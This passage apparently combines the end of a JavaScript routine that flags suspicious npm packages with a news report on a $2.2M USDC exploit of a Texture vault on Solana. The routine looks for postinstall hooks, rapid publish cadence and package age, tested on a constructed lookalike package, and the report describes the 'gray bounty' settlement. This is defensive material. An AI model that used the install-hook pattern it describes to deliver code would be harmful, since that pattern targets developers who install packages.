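  return { name: packageJson.name, findings, needsReview: findings.length > 0 };
}

// Constructed package.json: a postinstall hook is the classic delivery point.
const SAMPLE_PACKAGE_JSON = {
  name: 'solana-pump-test',
  version: '1.0.14',
  scripts: { postinstall: 'node ./scan.js', test: 'echo ok' },
};

// Constructed registry metadata: 15 versions, one every 40 minutes.
const SAMPLE_REGISTRY_DOC = (() => {
  const time = { created: '2025-08-15T10:00:00.000Z' };
  const start = Date.parse(time.created);
  for (let i = 0; i <= 14; i++) time[`1.0.${i}`] = new Date(start + i * 40 * 60 * 1000).toISOString();
  time.modified = time['1.0.14'];
  return { name: 'solana-pump-test', 'dist-tags': { latest: '1.0.14' }, time };
})();

const NOW = Date.parse('2025-08-20T00:00:00.000Z'); // fixed clock so the run is reproducible

console.log(vetPackage(SAMPLE_PACKAGE_JSON, SAMPLE_REGISTRY_DOC, NOW));
```

    Running installs with lifecycle scripts disabled (npm's ignore-scripts setting) removes the first signal entirely; the cadence and age checks are what catch a freshly registered lookalike whose code only runs when imported.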

  • Solana’s Texture Project Recovers $2.2M Crypto After Hacker Accepts “Gray Bounty” Deal

    A high-profile incident has recently concluded within the Solana ecosystem, involving the unauthorized extraction of cryptocurrency assets from the Texture project. Several days ago, an unidentified hacker exploited a vulnerability in one of the Texture Vaults’ smart contracts, siphoning approximately $2.2 million in USDC stablecoins. The attack was confined solely to the USDC vault; all other assets remained untouched.

    Immediately upon detecting the breach, the Texture team suspended all fund withdrawals to contain the situation and prevent any further exploitation. Simultaneously, they activated an internal “war room” to coordinate a rapid response. The developers swiftly identified and isolated the vulnerability and began working on a patch for the affected contract.

    Acknowledging that the attacker still retained control over the stolen funds, the team made an unorthodox decision—they offered the hacker a “gray bounty” amounting to 10% of the stolen assets, on the condition that the remaining 90% be returned without repercussions. This proposition was part of a broader strategy aimed at peaceful resolution, hoping to minimize losses and avoid protracted legal or technical conflict.

    Two hours after the final appeal, the attacker accepted the terms and transferred 90% of the funds back to Texture’s wallet on the Solana network. The team confirmed receipt of the assets and declared that, in light of the agreement being honored, no further action would be pursued against the perpetrator. This resolution sparked widespread discussion within the community. The team extended its gratitude to those who offered support and assisted in the negotiations.

    The developers are now finalizing a comprehensive review of the revised smart contract in collaboration with an external auditor. The updated contract will be redeployed shortly. A detailed technical report is also being prepared, which will elucidate the mechanics of the exploit, outline the vulnerability, and detail the measures implemented to bolster the system’s resilience.